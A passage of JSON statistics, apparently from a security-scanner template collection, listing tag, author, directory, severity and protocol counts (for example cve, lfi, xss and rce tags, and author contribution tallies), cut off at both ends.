pfusion","count":1},{"name":"gogs","count":1},{"name":"argussurveillance","count":1},{"name":"avalanche","count":1},{"name":"sentry","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"tjws","count":1},{"name":"beanshell","count":1},{"name":"dvwa","count":1},{"name":"linkedin","count":1},{"name":"ssl","count":1},{"name":"cacti","count":1},{"name":"expose","count":1},{"name":"tensorflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"ioncube","count":1},{"name":"panabit","count":1},{"name":"tamronos","count":1},{"name":"codeigniter","count":1},{"name":"flash","count":1},{"name":"azkaban","count":1},{"name":"bullwark","count":1},{"name":"ilo","count":1},{"name":"extractor","count":1},{"name":"vidyo","count":1},{"name":"simplecrm","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"svn","count":1},{"name":"goahead","count":1},{"name":"owasp","count":1},{"name":"razor","count":1},{"name":"panos","count":1},{"name":"commax","count":1},{"name":"qcubed","count":1},{"name":"metinfo","count":1},{"name":"csrf","count":1},{"name":"proftpd","count":1},{"name":"nuxeo","count":1},{"name":"sage","count":1},{"name":"grails","count":1},{"name":"synnefo","count":1},{"name":"fastapi","count":1},{"name":"totaljs","count":1},{"name":"tpshop","count":1},{"name":"wazuh","count":1},{"name":"aura","count":1},{"name":"solarlog","count":1},{"name":"netsweeper","count":1},{"name":"netgenie","count":1},{"name":"xiuno","count":1},{"name":"phpinfo","count":1},{"name":"octoprint","count":1},{"name":"rfi","count":1},{"name":"ruckus","count":1},{"name":"exacqvision","count":1},{"name":"soar","count":1},{"name":"ecom","count":1},{"name":"postgres","count":1},{"name":"trane","count":1},{"name":"xvr","count":1},{"name":"kyan","count":1},{"name":"monitorr","count":1},{"name":"alertmanager","count":1},{"name":"bazarr","count":1},{"name":"dotnet","count":1},{"name":"lutron","count":1},{"name":"ghost","count":1},{"name":"wavlink","count":1},{"name":"webui","count":1},{"name":"scs","count":1},{"name":"embedthis","count":1},{"name":"eyelock","count":1},{"name":"heroku","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"livezilla","count":1},{"name":"optiLink","count":1},{"name":"dnssec","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"aruba","count":1},{"name":"lighttpd","count":1},{"name":"qvisdvr","count":1},{"name":"jmx","count":1},{"name":"qdpm","count":1},{"name":"lotuscms","count":1},{"name":"javamelody","count":1},{"name":"hadoop","count":1},{"name":"resourcespace","count":1},{"name":"discord","count":1},{"name":"myucms","count":1},{"name":"opencast","count":1},{"name":"cves2016","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"wooyun","count":1},{"name":"eyou","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"ueditor","count":1},{"name":"sidekiq","count":1},{"name":"eprints","count":1},{"name":"bitly","count":1},{"name":"circontrol","count":1},{"name":"kong","count":1},{"name":"aspnuke","count":1},{"name":"faraday","count":1},{"name":"getsimple","count":1},{"name":"sceditor","count":1},{"name":"iceflow","count":1},{"name":"huijietong","count":1},{"name":"zmanda","count":1},{"name":"tika","count":1},{"name":"addpac","count":1},{"name":"openerp","count":1},{"name":"cors","count":1},{"name":"lansweeper","count":1},{"name":"swagger","count":1},{"name":"servicenow","count":1},{"name":"wamp","count":1},{"name":"emc","count":1},{"name":"ricoh","count":1},{"name":"openstack","count":1},{"name":"office365","count":1},{"name":"dbeaver","count":1},{"name":"centreon","count":1},{"name":"jenkin","count":1},{"name":"commscope","count":1},{"name":"lanproxy","count":1},{"name":"avtech","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"k8s","count":1},{"name":"triconsole","count":1},{"name":"hiboss","count":1},{"name":"miscrsoft","count":1},{"name":"subrion","count":1},{"name":"payara","count":1},{"name":"druid","count":1},{"name":"wing-ftp","count":1},{"name":"gridx","count":1},{"name":"plastic","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"monitorix","count":1},{"name":"svnserve","count":1},{"name":"redwood","count":1},{"name":"websvn","count":1},{"name":"adminer","count":1},{"name":"skywalking","count":1},{"name":"cse","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"spip","count":1},{"name":"sourcebans","count":1},{"name":"wmt","count":1},{"name":"ewebs","count":1},{"name":"jenzabar","count":1},{"name":"memcached","count":1},{"name":"mysql","count":1},{"name":"lancom","count":1},{"name":"krweb","count":1},{"name":"blind","count":1},{"name":"xdcms","count":1},{"name":"arl","count":1},{"name":"wondercms","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"sar2html","count":1},{"name":"linksys","count":1},{"name":"iptime","count":1},{"name":"hortonworks","count":1},{"name":"perl","count":1},{"name":"exponentcms","count":1},{"name":"salesforce","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"gitlist","count":1},{"name":"tileserver","count":1},{"name":"turbocrm","count":1},{"name":"smi","count":1},{"name":"setup","count":1},{"name":"acontent","count":1},{"name":"craftcms","count":1},{"name":"mediumish","count":1},{"name":"robomongo","count":1},{"name":"magicflow","count":1},{"name":"clink-office","count":1},{"name":"openrestry","count":1},{"name":"plone","count":1},{"name":"landrayoa","count":1},{"name":"cocoon","count":1},{"name":"solman","count":1},{"name":"apiman","count":1},{"name":"keenetic","count":1},{"name":"zenario","count":1},{"name":"k8","count":1},{"name":"jitsi","count":1},{"name":"javascript","count":1},{"name":"timeclock","count":1},{"name":"opentsdb","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"viewpoint","count":1},{"name":"rabbitmq","count":1},{"name":"webftp","count":1},{"name":"phalcon","count":1},{"name":"dom","count":1},{"name":"diris","count":1},{"name":"xml","count":1},{"name":"opm","count":1},{"name":"expressjs","count":1},{"name":"biometrics","count":1},{"name":"ssltls","count":1},{"name":"sitecore","count":1},{"name":"upnp","count":1},{"name":"zeroshell","count":1},{"name":"kerbynet","count":1},{"name":"jeewms","count":1},{"name":"influxdb","count":1},{"name":"wuzhicms","count":1},{"name":"selea","count":1},{"name":"enumeration","count":1},{"name":"nexusdb","count":1},{"name":"comodo","count":1},{"name":"concrete","count":1},{"name":"visualtools","count":1},{"name":"auth","count":1},{"name":"mautic","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"cyberoam","count":1},{"name":"email","count":1},{"name":"sco","count":1},{"name":"anchorcms","count":1},{"name":"st","count":1},{"name":"erp-nc","count":1},{"name":"redis","count":1},{"name":" default-login","count":1},{"name":"dvr","count":1},{"name":"zyxel","count":1},{"name":"octobercms","count":1},{"name":"favicon","count":1},{"name":"owa","count":1},{"name":"spring","count":1},{"name":"tectuus","count":1},{"name":"checkpoint","count":1},{"name":"redhat","count":1},{"name":"bolt","count":1},{"name":"cherokee","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"klog","count":1},{"name":"nedi","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"camera","count":1},{"name":"maccmsv10","count":1},{"name":"fastcgi","count":1},{"name":"crm","count":1},{"name":"sophos","count":1},{"name":"bash","count":1},{"name":"nc2","count":1},{"name":"clockwatch","count":1},{"name":"viewlinc","count":1},{"name":"yealink","count":1},{"name":"labtech","count":1},{"name":"zte","count":1},{"name":"ruby","count":1},{"name":"sarg","count":1},{"name":"floc","count":1},{"name":"fuelcms","count":1},{"name":"pyramid","count":1},{"name":"cobub","count":1},{"name":"wavemaker","count":1},{"name":"2014","count":1},{"name":"cerebro","count":1},{"name":"scimono","count":1},{"name":"cgi","count":1},{"name":"netmask","count":1},{"name":"dotnetnuke","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"mongo","count":1},{"name":"circontrorl","count":1},{"name":"rdp","count":1},{"name":"liferay","count":1},{"name":"fortigate","count":1},{"name":"traefik","count":1},{"name":"twitter-server","count":1},{"name":"shopware","count":1},{"name":"majordomo2","count":1},{"name":"zcms","count":1},{"name":"meraki","count":1},{"name":"feifeicms","count":1},{"name":"mantisbt","count":1},{"name":"openemr","count":1},{"name":"geutebruck","count":1},{"name":"mara","count":1},{"name":"xff","count":1},{"name":"doh","count":1},{"name":"idemia","count":1},{"name":"realteo","count":1},{"name":"fortinet","count":1},{"name":"episerver","count":1},{"name":"sprintful","count":1},{"name":"esmtp","count":1},{"name":"linux","count":1},{"name":"zookeeper","count":1},{"name":"bruteforce","count":1},{"name":"whm","count":1},{"name":"drone","count":1},{"name":"enum","count":1},{"name":"netrc","count":1},{"name":"glances","count":1},{"name":"javafaces","count":1},{"name":"zm","count":1},{"name":"mdb","count":1},{"name":"calendarix","count":1},{"name":"tensorboard","count":1},{"name":"finereport","count":1},{"name":"cofax","count":1},{"name":"couchbase","count":1},{"name":"dompdf","count":1},{"name":"phpunit","count":1},{"name":"seacms","count":1},{"name":"gloo","count":1},{"name":"bookstack","count":1},{"name":"rhymix","count":1},{"name":"rujjie","count":1},{"name":"dotclear","count":1},{"name":"gotmls","count":1},{"name":"mongoshake","count":1},{"name":"vsphere","count":1},{"name":"powercreator","count":1},{"name":"froxlor","count":1},{"name":"tenda","count":1},{"name":"lg-nas","count":1},{"name":"opensns","count":1},{"name":"pulsesecure","count":1},{"name":"flink","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"postmessage","count":1},{"name":"weiphp","count":1},{"name":"sqlite","count":1},{"name":"codemeter","count":1},{"name":"vscode","count":1},{"name":"exposures","count":1},{"name":"visionhub","count":1},{"name":"h3c-imc","count":1},{"name":"oscommerce","count":1},{"name":"varnish","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"htmli","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"ulterius","count":1},{"name":"spf","count":1},{"name":"mariadb","count":1},{"name":"gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":690},{"name":"lfi","count":250},{"name":"panel","count":248},{"name":"xss","count":227},{"name":"exposure","count":226},{"name":"wordpress","count":207},{"name":"rce","count":195},{"name":"tech","count":169},{"name":"cve2020","count":160},{"name":"wp-plugin","count":140},{"name":"cve2021","count":115},{"name":"cve2019","count":93},{"name":"config","count":93},{"name":"cve2018","count":82},{"name":"joomla","count":74},{"name":"apache","count":68},{"name":"takeover","count":66},{"name":"token","count":65},{"name":"cve2010","count":64},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":51},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"","count":36},{"name":"oracle","count":36},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"logs","count":30},{"name":"redirect","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":17},{"name":"debug","count":16},{"name":"cve2014","count":15},{"name":"misconfig","count":15},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"php","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"dell","count":10},{"name":"aws","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"intrusive","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"backup","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"vmware","count":7},{"name":"ibm","count":7},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"microsoft","count":5},{"name":"dedecms","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"wso2","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"resin","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"magmi","count":4},{"name":"proxy","count":4},{"name":"vpn","count":4},{"name":"firmware","count":4},{"name":"artifactory","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"elastic","count":4},{"name":"symfony","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"openssh","count":3},{"name":"fanruan","count":3},{"name":"httpd","count":3},{"name":"tikiwiki","count":3},{"name":"bypass","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"ebs","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"ofbiz","count":3},{"name":"slack","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"log","count":3},{"name":"mail","count":3},{"name":"openam","count":3},{"name":"zabbix","count":3},{"name":"camera","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"kibana","count":3},{"name":"git","count":3},{"name":"npm","count":3},{"name":"kevinlab","count":3},{"name":"microstrategy","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"injection","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"zhiyuan","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"openfire","count":2},{"name":"cache","count":2},{"name":"axis","count":2},{"name":"oauth","count":2},{"name":"shellshock","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"cve2005","count":2},{"name":"splunk","count":2},{"name":"ec2","count":2},{"name":"activemq","count":2},{"name":"db","count":2},{"name":"hoteldruid","count":2},{"name":"jsf","count":2},{"name":"xxljob","count":2},{"name":"seeyon","count":2},{"name":"frp","count":2},{"name":"showdoc","count":2},{"name":"hostheader-injection","count":2},{"name":"dolibarr","count":2},{"name":"glassfish","count":2},{"name":"hasura","count":2},{"name":"horde","count":2},{"name":"bucket","count":2},{"name":"icewarp","count":2},{"name":"ecology","count":2},{"name":"wordfence","count":2},{"name":"storage","count":2},{"name":"status","count":2},{"name":"akkadian","count":2},{"name":"netis","count":2},{"name":"backdoor","count":2},{"name":"kentico","count":2},{"name":"yii","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"geowebserver","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"sharepoint","count":2},{"name":"spark","count":2},{"name":"harbor","count":2},{"name":"totemomail","count":2},{"name":"phpcollab","count":2},{"name":"sonicwall","count":2},{"name":"avantfax","count":2},{"name":"netsweeper","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"odoo","count":2},{"name":"rockethchat","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"leak","count":2},{"name":"jeedom","count":2},{"name":"nagios","count":2},{"name":"ilo","count":2},{"name":"adminer","count":2},{"name":"prtg","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"rockmongo","count":2},{"name":"middleware","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"akamai","count":2},{"name":"axis2","count":2},{"name":"bruteforce","count":2},{"name":"sonarqube","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"guacamole","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"github","count":2},{"name":"node","count":2},{"name":"paloalto","count":2},{"name":"azure","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"grav","count":2},{"name":"chiyu","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"flir","count":2},{"name":"cve2007","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"nextcloud","count":2},{"name":"beanshell","count":1},{"name":"wondercms","count":1},{"name":"tor","count":1},{"name":"sar2html","count":1},{"name":"erp-nc","count":1},{"name":"uwsgi","count":1},{"name":"swagger","count":1},{"name":"wmt","count":1},{"name":"yealink","count":1},{"name":"plastic","count":1},{"name":"announcekit","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"jfrog","count":1},{"name":"phpwiki","count":1},{"name":"aura","count":1},{"name":"openrestry","count":1},{"name":"gstorage","count":1},{"name":"mailchimp","count":1},{"name":"h3c-imc","count":1},{"name":"visualtools","count":1},{"name":"realteo","count":1},{"name":"solman","count":1},{"name":"vsftpd","count":1},{"name":"api-manager","count":1},{"name":"pacsone","count":1},{"name":"razor","count":1},{"name":"opencast","count":1},{"name":"landrayoa","count":1},{"name":"cve2006","count":1},{"name":"traefik","count":1},{"name":"graphql","count":1},{"name":"maccmsv10","count":1},{"name":"upload","count":1},{"name":"clink-office","count":1},{"name":"owa","count":1},{"name":"bolt","count":1},{"name":"sureline","count":1},{"name":"checkpoint","count":1},{"name":"dotnet","count":1},{"name":"bedita","count":1},{"name":"fortigate","count":1},{"name":"eyou","count":1},{"name":"mysql","count":1},{"name":"frontpage","count":1},{"name":"varnish","count":1},{"name":"sitecore","count":1},{"name":"auth","count":1},{"name":"gogs","count":1},{"name":"hiawatha","count":1},{"name":"mpsec","count":1},{"name":"bash","count":1},{"name":"actuator","count":1},{"name":"resourcespace","count":1},{"name":"visionhub","count":1},{"name":"pgadmin","count":1},{"name":"wifisky","count":1},{"name":"exposures","count":1},{"name":"ambari","count":1},{"name":"keenetic","count":1},{"name":"logontracer","count":1},{"name":"xml","count":1},{"name":"avalanche","count":1},{"name":"sceditor","count":1},{"name":"starttls","count":1},{"name":"terraform","count":1},{"name":"nuxeo","count":1},{"name":"lansweeper","count":1},{"name":"spf","count":1},{"name":"episerver","count":1},{"name":"adb","count":1},{"name":"jquery"